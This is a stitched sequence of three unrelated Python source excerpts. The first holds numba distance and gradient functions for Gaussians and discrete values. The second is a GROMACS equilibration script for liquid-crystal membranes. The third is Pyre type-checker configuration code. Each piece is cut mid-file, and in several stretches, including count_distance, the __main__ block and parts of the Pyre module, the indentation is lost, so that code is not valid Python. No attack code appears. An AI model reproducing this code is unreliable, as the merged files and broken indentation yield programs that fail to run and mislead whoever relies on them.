        - cross_term * mu_1 * mu_2
        + np.abs(sigma_11) * (mu_2 ** 2)
    )
    dist = (m_dist / det + np.log(np.abs(det))) / 2.0 + np.log(2 * np.pi)
    # BUG FIX: was np.empty(6), which left the last two entries of the
    # returned gradient uninitialized garbage; x has only 4 parameters,
    # matching the length-4 gradient of the det == 0 branch above.
    grad = np.empty(4, dtype=np.float32)
    grad[0] = (2 * sigma_22 * mu_1 - cross_term * mu_2) / (2 * det)
    grad[1] = (2 * sigma_11 * mu_2 - cross_term * mu_1) / (2 * det)
    grad[2] = sign_s1 * (sigma_22 * (det - m_dist) + det * mu_2 ** 2) / (2 * det ** 2)
    grad[3] = sign_s2 * (sigma_11 * (det - m_dist) + det * mu_1 ** 2) / (2 * det ** 2)
    return dist, grad
@numba.njit(fastmath=True)
def gaussian_energy_grad(x, y):  # pragma: no cover
    """Distance and gradient between two general (rotated) 2D Gaussians.

    ``x`` and ``y`` are packed as (mu_1, mu_2, width, height, angle); the
    returned gradient is taken with respect to ``x``.

    WARNING: mutates both ``x`` and ``y`` in place (the two scale entries
    are replaced by their absolute values, the angle is folded through
    ``arcsin(sin(.))``).
    """
    mu_1 = x[0] - y[0]
    mu_2 = x[1] - y[1]
    # Ensure width are positive
    x[2] = np.abs(x[2])
    y[2] = np.abs(y[2])
    # Ensure heights are positive
    x[3] = np.abs(x[3])
    y[3] = np.abs(y[3])
    # Fold the angle through arcsin(sin(.)).
    # NOTE(review): this lands in [-pi/2, pi/2], not "-pi,pi" as the original
    # comment claimed -- confirm this is the intended symmetry reduction.
    x[4] = np.arcsin(np.sin(x[4]))
    y[4] = np.arcsin(np.sin(y[4]))
    # Covariance entries for y
    a = y[2] * np.cos(y[4]) ** 2 + y[3] * np.sin(y[4]) ** 2
    b = (y[2] - y[3]) * np.sin(y[4]) * np.cos(y[4])
    c = y[3] * np.cos(y[4]) ** 2 + y[2] * np.sin(y[4]) ** 2
    # Sum of covariance matrices
    sigma_11 = x[2] * np.cos(x[4]) ** 2 + x[3] * np.sin(x[4]) ** 2 + a
    sigma_12 = (x[2] - x[3]) * np.sin(x[4]) * np.cos(x[4]) + b
    sigma_22 = x[2] * np.sin(x[4]) ** 2 + x[3] * np.cos(x[4]) ** 2 + c
    # Determinant of the sum of covariances
    det_sigma = np.abs(sigma_11 * sigma_22 - sigma_12 ** 2)
    x_inv_sigma_y_numerator = (
        sigma_22 * mu_1 ** 2 - 2 * sigma_12 * mu_1 * mu_2 + sigma_11 * mu_2 ** 2
    )
    if det_sigma < 1e-32:
        # Near-singular combined covariance: fall back to squared Euclidean
        # distance on the means with a fixed gradient direction.
        return (
            mu_1 ** 2 + mu_2 ** 2,
            np.array([0.0, 0.0, 1.0, 1.0, 0.0], dtype=np.float32),
        )
    dist = x_inv_sigma_y_numerator / det_sigma + np.log(det_sigma) + np.log(2 * np.pi)
    grad = np.zeros(5, np.float32)
    # Gradient w.r.t. the two mean components.
    grad[0] = (2 * sigma_22 * mu_1 - 2 * sigma_12 * mu_2) / det_sigma
    grad[1] = (2 * sigma_11 * mu_2 - 2 * sigma_12 * mu_1) / det_sigma
    # Gradient w.r.t. width x[2]; the 1e-8 guards division by det_sigma**2.
    grad[2] = mu_2 * (mu_2 * np.cos(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
    grad[2] += mu_1 * (mu_1 * np.sin(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
    grad[2] *= det_sigma
    grad[2] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_22
    grad[2] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_11
    grad[2] += x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
    grad[2] /= det_sigma ** 2 + 1e-8
    # Gradient w.r.t. height x[3] (mirror of the width term).
    grad[3] = mu_1 * (mu_1 * np.cos(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
    grad[3] += mu_2 * (mu_2 * np.sin(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
    grad[3] *= det_sigma
    grad[3] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_22
    grad[3] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_11
    grad[3] -= x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
    grad[3] /= det_sigma ** 2 + 1e-8
    # Gradient w.r.t. the rotation angle x[4].
    grad[4] = (x[3] - x[2]) * (
        2 * mu_1 * mu_2 * np.cos(2 * x[4]) - (mu_1 ** 2 - mu_2 ** 2) * np.sin(2 * x[4])
    )
    grad[4] *= det_sigma
    grad[4] -= x_inv_sigma_y_numerator * (x[3] - x[2]) * np.sin(2 * x[4]) * sigma_22
    grad[4] -= x_inv_sigma_y_numerator * (x[2] - x[3]) * np.sin(2 * x[4]) * sigma_11
    grad[4] -= x_inv_sigma_y_numerator * 2 * sigma_12 * (x[2] - x[3]) * np.cos(2 * x[4])
    grad[4] /= det_sigma ** 2 + 1e-8
    return dist, grad
@numba.njit(fastmath=True)
def spherical_gaussian_grad(x, y):  # pragma: no cover
    """Distance and gradient between two isotropic (spherical) 2-D Gaussians.

    ``x`` and ``y`` are 3-vectors ``(x0, x1, sigma)`` holding a 2-D mean and a
    single shared variance term. Returns ``(dist, grad)`` where ``grad`` is a
    float32 array of d(dist)/d(x[i]).
    """
    dx = x[0] - y[0]
    dy = x[1] - y[1]
    pooled_sigma = x[2] + y[2]
    sigma_sign = np.sign(pooled_sigma)

    # Degenerate combined variance: return a fixed large distance and push
    # the variance parameter downward via the gradient.
    if pooled_sigma == 0:
        return 10.0, np.array([0.0, 0.0, -1.0], dtype=np.float32)

    abs_sigma = np.abs(pooled_sigma)
    dist = (
        (dx ** 2 + dy ** 2) / abs_sigma
        + 2 * np.log(abs_sigma)
        + np.log(2 * np.pi)
    )

    grad = np.empty(3, dtype=np.float32)
    grad[0] = (2 * dx) / abs_sigma
    grad[1] = (2 * dy) / abs_sigma
    grad[2] = sigma_sign * (
        -(dx ** 2 + dy ** 2) / (pooled_sigma ** 2) + (2 / abs_sigma)
    )
    return dist, grad
# Special discrete distances -- where x and y are objects, not vectors
def get_discrete_params(data, metric):
    """Derive per-metric normalisation parameters from the raw data.

    Supported metrics are "ordinal", "count" and "string"; any other metric
    gets an empty parameter dict. The returned dict is passed as keyword
    arguments to the corresponding discrete distance function.
    """
    if metric == "ordinal":
        # Half the observed value range acts as the support size.
        spread = float(data.max() - data.min())
        return {"support_size": spread / 2.0}
    if metric == "count":
        lo = scipy.stats.tmin(data)
        hi = scipy.stats.tmax(data)
        rate = scipy.stats.tmean(data)
        norm = count_distance(lo, hi, poisson_lambda=rate)
        return {
            "poisson_lambda": rate,
            "normalisation": norm / 2.0,  # heuristic
        }
    if metric == "string":
        lengths = np.array([len(s) for s in data])
        longest = scipy.stats.tmax(lengths)
        max_dist = longest / 1.5  # heuristic
        return {"normalisation": max_dist / 2.0, "max_dist": max_dist / 2.0}  # heuristic
    return {}
@numba.jit()
def categorical_distance(x, y):
    """Discrete 0/1 metric: 0.0 when the two values are equal, 1.0 otherwise."""
    return 0.0 if x == y else 1.0
@numba.jit()
def hierarchical_categorical_distance(x, y, cat_hierarchy=[{}]):
    """Distance between two categorical values under a category hierarchy.

    ``cat_hierarchy`` is a list of dicts, one per hierarchy level (finest
    first), each mapping a raw value to its group at that level. The distance
    is ``level / n_levels`` for the first (finest) level at which ``x`` and
    ``y`` fall in the same group, or 1.0 if no level groups them together.

    Bug fix: the original returned 1.0 from inside the loop's ``else`` branch,
    so only level 0 was ever consulted and deeper hierarchy levels were dead
    code. The "no match anywhere" result now comes after the loop.

    Note: the mutable default ``[{}]`` is kept for interface compatibility;
    it is never mutated here.
    """
    n_levels = float(len(cat_hierarchy))
    for level, cats in enumerate(cat_hierarchy):
        if cats[x] == cats[y]:
            return float(level) / n_levels
    # x and y share no group at any level: maximal distance.
    return 1.0
@numba.njit()
def ordinal_distance(x, y, support_size=1.0):
    """Absolute difference between two ordinal values, scaled by the support size."""
    gap = x - y
    if gap < 0:
        gap = -gap
    return gap / support_size
@numba.jit()
def count_distance(x, y, poisson_lambda=1.0, normalisation=1.0):
lo = int(min(x, y))
hi = int(max(x, y))
log_lambda = np.log(poisson_lambda)
if lo < 2:
log_k_factorial = 0.0
elif lo < 10:
log_k_factorial = 0.0
for k in range(2, lo):
log_k_factorial += np.log(k)
else:
log_k_factorial = approx_log_Gamma(lo + 1)
result = 0.0
for k in range(lo, hi):
result += k * log_lambda - poisson_lambda - log_k_factorial
log_k_factorial += np.log(k)
| |
<reponame>shirtsgroup/LLC_Membranes<filename>LLC_Membranes/setup/equil.py
#!/usr/bin/env python
import argparse
import os
import subprocess
from LLC_Membranes.setup.gentop import SystemTopology
from LLC_Membranes.setup.genmdp import SimulationMdp
from LLC_Membranes.setup.restrain import RestrainedTopology
from LLC_Membranes.llclib import topology, physical, file_rw, gromacs
import mdtraj as md
import numpy as np
location = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) # Directory this script is in
def initialize():
    """Build the argument parser for the HII-phase solvation/equilibration script.

    Returns the configured ``argparse.ArgumentParser`` (not the parsed args),
    so callers invoke ``initialize().parse_args()``. Flags mirror those of
    ``build.py`` where noted so the same build options can be forwarded.
    """
    parser = argparse.ArgumentParser(description='Solvate system and adjust so there is a certain wt % of water')

    parser.add_argument('-i', '--initial', default='initial.gro', help='Coordinate file to add water to')
    parser.add_argument('-ratio', '--ratio', default=1.5, type=float, help='Ratio of water in pores to water in tails')
    parser.add_argument('-wt', '--weight_percent', default=10, type=float, help='Total weight percent of water')
    parser.add_argument('-tol', '--tolerance', default=1, type=int, help='Number of water molecules')
    parser.add_argument('-guess_range', default=[.4, 1], nargs='+', help='If water_content.db has no entries for the '
                        'build monomer, an initial radius will be randomly selected from this range')
    parser.add_argument('-guess_stride', default=0.2, type=float, help='How far above/below the highest/lowest value to'
                        'make the next guess at pore radius if you need more/less water than the bounds of the water '
                        'content database (nm)')
    parser.add_argument('-o', '--output', default='solvated_final.gro', help='Name of output file')

    # parallelization
    parser.add_argument('-mpi', '--mpi', action="store_true", help='Run MD simulations in parallel')
    parser.add_argument('-np', '--nproc', default=4, type=int, help='Number of MPI processes')

    # same flags as to build.py
    parser.add_argument('-b', '--build_monomer', default='NAcarb11V.gro', nargs='+', type=str, help='Name of single '
                        'monomer structure file (.gro format) used to build full system')
    parser.add_argument('-m', '--monomers_per_column', default=20, type=int, help='Number of monomers to stack in each'
                        'column')
    parser.add_argument('-c', '--ncolumns', default=5, type=int, help='Number of columns used to build each pore')
    parser.add_argument('-r', '--pore_radius', default=.6, type=float, help='Initial guess at pore radius (nm)')
    parser.add_argument('-p', '--p2p', default=4.5, type=float, help='Initial pore-to-pore distance (nm)')
    parser.add_argument('-n', '--nopores', default=4, type=int, help='Number of pores (only works with 4 currently)')
    parser.add_argument('-d', '--dbwl', default=.37, type=float, help='Distance between vertically stacked monomers'
                        '(nm)')
    parser.add_argument('-pd', '--parallel_displaced', default=0, type=float, help='Angle of wedge formed between line'
                        'extending from pore center to monomer and line from pore center to vertically adjacent monomer'
                        'head group.')
    parser.add_argument('-angles', '--angles', nargs='+', default=[90, 90, 60], type=float, help='Angles between'
                        'box vectors')
    parser.add_argument('-seed', '--random_seed', default=False, type=int, help='Pass an integer to give a seed for '
                        'random column displacement')
    # NOTE(review): default is a bare float although nargs='+' normally yields a
    # list; HexagonalPhaseEquilibration.build() wraps a lone float in a list.
    parser.add_argument('-mf', '--mol_frac', nargs='+', default=1., type=float, help='If using the -random flag, this gives'
                        'the relative amount of each monomer to add. List the fractions in the same order as'
                        '-build_monomer')

    # flags unique to equil.sh
    parser.add_argument('-ring_restraints', '--ring_restraints', default=["C", "C1", "C2", "C3", "C4", "C5"], nargs='+',
                        help='Name of atoms used to restrain head groups during initial equilibration.')
    parser.add_argument('-forces', default=[1000000, 3162, 56, 8, 3, 2, 1, 0], help='Sequence of force constants to'
                        'apply to ring restraints')
    parser.add_argument('-l_nvt', '--length_nvt', default=50, type=int, help='Length of restrained NVT simulations '
                        '(ps)')
    parser.add_argument('-lb', '--length_berendsen', default=5000, type=int, help='Length of simulation using berendsen'
                        'pressure control')
    parser.add_argument('-lpr', '--length_Parrinello_Rahman', default=400000, type=int, help='Length of simulation '
                        'using Parrinello-Rahman pressure control')
    parser.add_argument('--restraint_residue', default='HII', nargs='+', type=str,
                        help='Name of residue to which ring_restraint atoms belong')
    parser.add_argument('--restraint_axis', default='xyz', type=str, help='Axes along which to apply position '
                        'restraints')
    parser.add_argument('--continue_initial_config', default=None, help='Equilibrate energy minimized initial '
                        'configuration.')
    parser.add_argument('-try', '--ntries', default=10, type=int, help='The number of times to try to energy minimize an initial'
                        'configuration before resorting to scaling + shrinking it.')

    return parser
# TODO: make a yaml
class HexagonalPhaseEquilibration:
    """Orchestrate building and staged equilibration of an inverted hexagonal
    (HII) LLC membrane with GROMACS.

    The instance tracks the name of the current coordinate file
    (``self.gro_name``); each stage (build, energy minimization, NVT, shrink)
    updates it so the next stage picks up where the previous one left off.
    External tools are driven through ``subprocess`` (build.py, gmx) and the
    ``gromacs.simulate`` helper.
    """

    def __init__(self, build_monomers, mpi=False, nprocesses=4):
        """Store build options and load a topology.LC object per monomer type.

        :param build_monomers: list of monomer structure file names
        :param mpi: if True, run GROMACS via ``mpirun ... gmx_mpi``
        :param nprocesses: number of MPI processes when ``mpi`` is True
        """
        self.build_monomers = build_monomers
        self.lc = [topology.LC(m) for m in self.build_monomers]  # one LC description per monomer type
        self.gro_name = None  # name of the current coordinate (.gro) file; updated after each stage
        self.top = None  # SystemTopology, created in generate_input_files()
        self.mdp = None  # SimulationMdp, created in generate_input_files()
        self.mpi = mpi
        self.nprocesses = nprocesses

    def build(self, build_monomer, out, mon_per_col, ncol, radius, p2p, dbwl, pd, nopores=4, seed=False,
              mole_fraction=1.):
        """Run build.py as a subprocess to create the initial HII configuration.

        ``out`` becomes the new ``self.gro_name``. A lone float
        ``mole_fraction`` is wrapped in a list before being forwarded.
        """
        # TODO: incorporate class-based functionality
        # update once build.py is more class-based
        build = 'build.py -phase h2 -m %s -c %s -r %s -p %s -n %s -d %s -pd %s -o %s -b' % (mon_per_col, ncol,
                radius, p2p, nopores, dbwl, pd, out)
        for mon in build_monomer:
            build += ' %s' % mon
        if type(mole_fraction) is float:
            mole_fraction = [mole_fraction]
        build += ' -mf'
        for mf in mole_fraction:
            build += ' %s' % mf
        if seed:
            build += ' -seed %s' % seed
        subprocess.Popen(build.split()).wait()
        self.gro_name = out

    def generate_input_files(self, ensemble, length, barostat='berendsen', genvel=True, xlink=False, restraints=False,
                             frames=50, dt=0.002):
        """Write .mdp files (EM plus the requested ensemble) and the system topology.

        :param ensemble: 'npt' or 'nvt' — which production .mdp to write
        :param length: simulation length (ps); output frequency is derived so
            roughly ``frames`` frames are saved
        """
        # mostly uses defaults for now
        nstout = int(length / (dt * frames))  # steps between saved frames
        self.mdp = SimulationMdp(self.gro_name, length=length, barostat=barostat, genvel=genvel, restraints=restraints,
                                 xlink=xlink, nstxout=nstout, nstvout=nstout, nstfout=nstout, nstenergy=nstout)
        self.mdp.write_em_mdp()  # write energy minimization .mdp without asking
        if ensemble == 'npt':
            self.mdp.write_npt_mdp()
        elif ensemble == 'nvt':
            self.mdp.write_nvt_mdp()
        fix_residues = False
        # after restrained simulation, all residues in the output gro share the
        # same number, preventing proper labeling
        if len(self.build_monomers) > 1:  # and not restraints # this condition may provide marginal speedup
            fix_residues = True
        self.top = SystemTopology(self.gro_name, restraints=restraints, xlink=xlink, fix_residues=fix_residues)
        self.top.write_top()

    def restrain(self, build_monomer, force, axis, restraint_atoms):
        """Write a topology with position restraints of strength ``force`` on
        ``restraint_atoms``, applied along each axis in ``axis``."""
        top = RestrainedTopology(self.gro_name, build_monomer, restraint_atoms, com=False)
        top.add_position_restraints(axis, [force for _ in range(len(axis))])
        top.write_topology()

    def shrink_unit_cell(self, start, stop=1, step=0.2):
        """ Sequentially energy minimize a structure to a packing structure by isotropically scaling the distance between
        monomer head groups

        Scales z-coordinates from ``start`` down toward ``stop`` in decrements
        of ``step``. If an energy minimization fails (non-negative potential
        energy), recurses with half the step size from the last good geometry.

        :return:
        """
        for i in np.linspace(start - step, stop, int(round((start - stop) / step))):
            f = i / (i + step)  # relative scale factor from previous iteration's size
            self.scale_columns(f)
            print('Attempting energy minimization with box lengths %.4f times desired size' % i, end='', flush=True)
            nrg = gromacs.simulate(self.mdp.em_mdp_name, self.top.name, self.gro_name,
                                   self.mdp.em_mdp_name.split('.')[0], em_energy=True, verbose=False, mpi=self.mpi,
                                   nprocesses=self.nprocesses, restraints=True)
            if nrg >= 0:
                # minimization failed; retry from previous geometry at half the rate
                print('...Failed. Will shrink slower on next iteration.')
                self.gro_name = 'scaled_%.4f.gro' % (i + step)
                self.shrink_unit_cell(i + step, i, step / 2)  # reduce shrink rate
            else:
                print('Running short NVT simulation...', end='', flush=True)
                self.gro_name = self.mdp.em_mdp_name.split('.')[0] + '.gro'
                self.simulate(self.mdp.nvt_mdp_name, self.top.name, 'nvt_%.4f' % i, restrained=True)
                print('...Success!')
                # keep a checkpoint of the successfully minimized geometry
                cp = 'cp em.gro scaled_%.4f.gro' % i
                p = subprocess.Popen(cp.split())
                p.wait()

    def scale_columns(self, scale_factor):
        """Scale the z center-of-mass of every monomer by ``scale_factor`` and
        write the result to 'scaled.gro' (which becomes ``self.gro_name``).

        Residues are located via each LC's pore-defining atoms; the box's
        z-vector is scaled by the same factor.
        """
        pore_defining_atoms = [self.lc[i].pore_defining_atoms for i in range(len(self.lc))]
        t = md.load(self.gro_name)
        resnames = [a.residue.name for a in t.topology.atoms]
        ids = [a.name for a in t.topology.atoms]
        indices = [[] for _ in range(len(self.lc))]
        monomers = {l.name: i for i, l in enumerate(self.lc)}
        for a in t.topology.atoms:
            try:
                mon = monomers[a.residue.name]
                if a.name in pore_defining_atoms[mon]:
                    indices[mon].append(a.index)
            except KeyError:
                # atom belongs to a residue that is not one of the monomers (e.g. solvent)
                pass
        mass = [[self.lc[i].mass[a] for a in self.lc[i].LC_names if a in pda]
                for i, pda in enumerate(pore_defining_atoms)]
        com = []
        for m in range(len(monomers.values())):
            com.append(physical.center_of_mass(t.xyz[:, indices[m], :], mass[m]))
        # rebuild unit cell with scaled center-of-mass z coordinates
        nres = [len(indices[i]) // len(pore_defining_atoms[i]) for i in range(len(self.lc))]
        ndx = 0
        # NOTE(review): hard-coded for at most two monomer types — confirm if
        # more than two build monomers are ever used.
        n = [0, 0]
        for i in range(sum(nres)):
            mon = monomers[resnames[ndx]]
            end = ndx + self.lc[mon].natoms
            ref_z = com[mon][0, n[mon], 2]
            scaled_com = ref_z * scale_factor
            t.xyz[0, ndx:end, 2] += (scaled_com - ref_z)
            ndx = end  # - self.lc[mon].no_ions -- haven't tested
            n[mon] += 1
        ucell = t.unitcell_vectors[0, ...]
        ucell[2, 2] *= scale_factor
        self.gro_name = 'scaled.gro'
        file_rw.write_gro_pos(t.xyz[0, ...], self.gro_name, ids=ids, res=resnames, ucell=ucell)

    def simulate(self, mdp, top, out, restrained=False):
        """Run grompp + mdrun for the current coordinates; ``out``.gro becomes
        the new ``self.gro_name``.

        :param restrained: pass the current coordinates with ``-r`` so grompp
            has reference positions for position restraints
        """
        if self.mpi:
            gmx = "mpirun -np %s gmx_mpi" % self.nprocesses
        else:
            gmx = "gmx"
        grompp = "%s grompp -f %s -p %s -c %s -o %s" % (gmx, mdp, top, self.gro_name, out)
        if restrained:
            grompp += ' -r %s' % self.gro_name
        p = subprocess.Popen(grompp.split())
        p.wait()
        mdrun = "%s mdrun -v -deffnm %s" % (gmx, out)
        p = subprocess.Popen(mdrun.split())
        p.wait()
        self.gro_name = out + '.gro'
def check_energy(logname='em.log'):
    """Return the potential energy reported in a GROMACS log file.

    Scans ``logname`` for lines containing "Potential Energy" and keeps the
    value from the last such line. Returns 1 (a positive sentinel) when no
    such line is found, which callers treat as a failed minimization.
    """
    energy = 1
    with open(logname) as log_file:
        for entry in log_file:
            if entry.count("Potential Energy") == 1:
                energy = float(entry.split()[3])
    return energy
if __name__ == "__main__":
# TODO: replace equil.simulate() with gromacs.simulate()
args = initialize().parse_args()
os.environ["GMX_MAXBACKUP"] = "-1" # stop GROMACS from making backups
equil = HexagonalPhaseEquilibration(args.build_monomer, mpi=args.mpi, nprocesses=args.nproc)
lc = [topology.LC(mon) for mon in args.build_monomer]
atoms = [l.pore_defining_atoms for l in lc]
if args.continue_initial_config is None:
# initial build
equil.build(args.build_monomer, args.initial, args.monomers_per_column, args.ncolumns, args.pore_radius, args.p2p,
args.dbwl, args.parallel_displaced, nopores=args.nopores, seed=args.random_seed, mole_fraction=args.mol_frac)
# generate input files once
equil.restrain(args.build_monomer, args.forces[0], args.restraint_axis, atoms)
equil.generate_input_files('nvt', args.length_nvt, restraints=args.restraint_residue)
# try energy minimizing
nrg = gromacs.simulate(equil.mdp.em_mdp_name, equil.top.name, equil.gro_name, 'em', em_energy=True,
verbose=True, mpi=equil.mpi, nprocesses=4, restraints=True)
try_ = 0 # try rebuilding the system ntries times to see if we get any working configs
while nrg > 0 and try_ < args.ntries: # rebuild if that doesn't work
print('Try # %d' % (try_ + 1))
equil.build(args.build_monomer, args.initial, args.monomers_per_column, args.ncolumns, args.pore_radius,
args.p2p,
args.dbwl, args.parallel_displaced, nopores=args.nopores, seed=args.random_seed,
mole_fraction=args.mol_frac)
equil.restrain(args.build_monomer, args.forces[0], args.restraint_axis, atoms)
nrg = gromacs.simulate('em.mdp', equil.top.name, equil.gro_name, 'em', em_energy=True,
verbose=False, mpi=equil.mpi, nprocesses=4, restraints=True)
print(nrg)
try_ += 1
if nrg > 0: # if | |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import dataclasses
import glob
import json
import logging
import os
import shutil
import site
import subprocess
import sys
from dataclasses import dataclass, field
from logging import Logger
from pathlib import Path
from typing import (
Any,
Dict,
Iterable,
List,
Optional,
Sequence,
Set,
Type,
TypeVar,
Union,
)
import psutil
from .. import command_arguments, dataclasses_merge, find_directories
from ..filesystem import expand_global_root, expand_relative_path
from ..find_directories import (
BINARY_NAME,
CONFIGURATION_FILE,
get_relative_local_root,
LOCAL_CONFIGURATION_FILE,
LOG_DIRECTORY,
)
from . import (
exceptions,
ide_features as ide_features_module,
platform_aware,
python_version as python_version_module,
search_path as search_path_module,
shared_memory as shared_memory_module,
site_packages,
unwatched,
)
LOG: Logger = logging.getLogger(__name__)
T = TypeVar("T")
def _get_optional_value(source: Optional[T], default: T) -> T:
return source if source is not None else default
def _expand_and_get_existent_ignore_all_errors_path(
    ignore_all_errors: Iterable[str], project_root: str
) -> List[str]:
    """Expand the `ignore_all_errors` entries (globs and `//`-prefixed project
    paths) and return only those expanded paths that actually exist.

    A warning is logged once per missing entry: either "no matches found" for
    a glob pattern, or "nonexistent path" for a plain path.

    Bug fix: the missing-path branch previously logged an unconditional
    "Nonexistent paths" warning *and then* re-logged the same message in its
    `else` arm — producing a duplicate warning for plain paths and a
    misleading one for glob patterns. Only the specific warning remains.
    """
    expanded_ignore_paths = []
    for path in ignore_all_errors:
        expanded = glob.glob(expand_global_root(path, global_root=project_root))
        if not expanded:
            # Keep the unexpanded entry so the loop below can warn about it.
            expanded_ignore_paths.append(path)
        else:
            expanded_ignore_paths.extend(expanded)

    paths = []
    for path in expanded_ignore_paths:
        if os.path.exists(path):
            paths.append(path)
        elif _is_glob(path):
            LOG.warning(
                f"Within `ignore_all_errors`, no matches found to glob pattern: `{path}`"
            )
        else:
            LOG.warning(
                f"Nonexistent paths passed in to `ignore_all_errors`: `{path}`"
            )
    return paths
def _is_glob(path: str) -> bool:
if ("*" in path) or ("?" in path) or (("[" in path) and ("]" in path)):
return True
return False
@dataclasses.dataclass
class ExtensionElement:
    """A module filename extension Pyre should analyze, with an option to keep
    the suffix in the module's qualified name."""

    suffix: str
    include_suffix_in_module_qualifier: bool

    def command_line_argument(self) -> str:
        """Serialize to the backend's CLI form: the suffix, optionally followed
        by the `$include_suffix_in_module_qualifier` marker."""
        if self.include_suffix_in_module_qualifier:
            return self.suffix + "$" + "include_suffix_in_module_qualifier"
        return self.suffix

    @staticmethod
    def from_json(json: Union[str, Dict[str, Union[str, bool]]]) -> "ExtensionElement":
        """Parse either a bare suffix string or a `{"suffix": ..., "include_suffix_in_module_qualifier": ...}` dict.

        Raises `exceptions.InvalidConfiguration` for any other shape.
        """
        if isinstance(json, str):
            return ExtensionElement(
                suffix=json, include_suffix_in_module_qualifier=False
            )
        if isinstance(json, dict):
            qualify = json.get("include_suffix_in_module_qualifier")
            if not isinstance(qualify, bool):
                # Missing or mistyped flag defaults to False.
                qualify = False
            suffix = json.get("suffix")
            if isinstance(suffix, str):
                return ExtensionElement(
                    suffix=suffix,
                    include_suffix_in_module_qualifier=qualify,
                )
        raise exceptions.InvalidConfiguration(f"Invalid extension element: {json}")
def get_default_site_roots() -> List[str]:
    """Return the default site-package roots: the user site directory followed
    by the system site directories.

    Falls back to an empty list (with a warning) on virtualenvs whose `site`
    module lacks these functions.
    """
    try:
        user_site = site.getusersitepackages()
        system_sites = site.getsitepackages()
    except AttributeError:
        # There are a few Python versions that ship with a broken venv,
        # where `getsitepackages` is not available.
        LOG.warning(
            "Either `site.getusersitepackages()` or `site.getsitepackages()` "
            + "is not available in your virtualenv. This is a known virtualenv "
            + 'bug and as a workaround please explicitly specify `"site_root"` '
            + "in your Pyre configuration."
        )
        return []
    return [user_site] + system_sites
@dataclasses_merge.dataclass_merge
@dataclass(frozen=True)
class PartialConfiguration:
binary: Optional[str] = None
buck_mode: Optional[platform_aware.PlatformAware[str]] = field(
default=None,
metadata={"merge_policy": platform_aware.PlatformAware.merge_optional},
)
do_not_ignore_errors_in: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
dot_pyre_directory: Optional[Path] = None
excludes: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
extensions: Sequence[ExtensionElement] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
ide_features: Optional[ide_features_module.IdeFeatures] = field(
default=None,
metadata={"merge_policy": ide_features_module.IdeFeatures.merge_optional},
)
ignore_all_errors: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
isolation_prefix: Optional[str] = None
logger: Optional[str] = None
number_of_workers: Optional[int] = None
oncall: Optional[str] = None
other_critical_files: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
pysa_version_hash: Optional[str] = None
python_version: Optional[python_version_module.PythonVersion] = None
search_path: Sequence[search_path_module.RawElement] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
shared_memory: shared_memory_module.SharedMemory = (
shared_memory_module.SharedMemory()
)
site_package_search_strategy: Optional[site_packages.SearchStrategy] = None
site_roots: Optional[Sequence[str]] = None
source_directories: Optional[Sequence[search_path_module.RawElement]] = field(
default=None,
metadata={"merge_policy": dataclasses_merge.Policy.RAISE_WHEN_OVERWRITTEN},
)
strict: Optional[bool] = None
taint_models_path: Sequence[str] = field(
default_factory=list,
metadata={"merge_policy": dataclasses_merge.Policy.PREPEND},
)
targets: Optional[Sequence[str]] = field(
default=None,
metadata={"merge_policy": dataclasses_merge.Policy.RAISE_WHEN_OVERWRITTEN},
)
typeshed: Optional[str] = None
unwatched_dependency: Optional[unwatched.UnwatchedDependency] = None
use_buck2: Optional[bool] = None
version_hash: Optional[str] = None
@staticmethod
def _get_depreacted_map() -> Dict[str, str]:
return {"do_not_check": "ignore_all_errors"}
@staticmethod
def _get_extra_keys() -> Set[str]:
return {
"create_open_source_configuration",
"saved_state",
"stable_client",
"taint_models_path",
"unstable_client",
}
@staticmethod
def from_command_arguments(
arguments: command_arguments.CommandArguments,
) -> "PartialConfiguration":
strict: Optional[bool] = True if arguments.strict else None
source_directories = [
search_path_module.SimpleRawElement(element)
for element in arguments.source_directories
] or None
targets: Optional[List[str]] = (
arguments.targets if len(arguments.targets) > 0 else None
)
python_version_string = arguments.python_version
ide_features = (
ide_features_module.IdeFeatures(
hover_enabled=arguments.enable_hover,
go_to_definition_enabled=arguments.enable_go_to_definition,
find_symbols_enabled=arguments.enable_find_symbols,
)
if arguments.enable_hover is not None
or arguments.enable_go_to_definition is not None
else None
)
return PartialConfiguration(
binary=arguments.binary,
buck_mode=platform_aware.PlatformAware.from_json(
arguments.buck_mode, "buck_mode"
),
do_not_ignore_errors_in=arguments.do_not_ignore_errors_in,
dot_pyre_directory=arguments.dot_pyre_directory,
excludes=arguments.exclude,
extensions=[],
ide_features=ide_features,
ignore_all_errors=[],
isolation_prefix=arguments.isolation_prefix,
logger=arguments.logger,
number_of_workers=arguments.number_of_workers,
oncall=None,
other_critical_files=[],
pysa_version_hash=None,
python_version=(
python_version_module.PythonVersion.from_string(python_version_string)
if python_version_string is not None
else None
),
search_path=[
search_path_module.SimpleRawElement(element)
for element in arguments.search_path
],
shared_memory=shared_memory_module.SharedMemory(
heap_size=arguments.shared_memory_heap_size,
dependency_table_power=arguments.shared_memory_dependency_table_power,
hash_table_power=arguments.shared_memory_hash_table_power,
),
site_package_search_strategy=None,
site_roots=None,
source_directories=source_directories,
strict=strict,
taint_models_path=[],
targets=targets,
typeshed=arguments.typeshed,
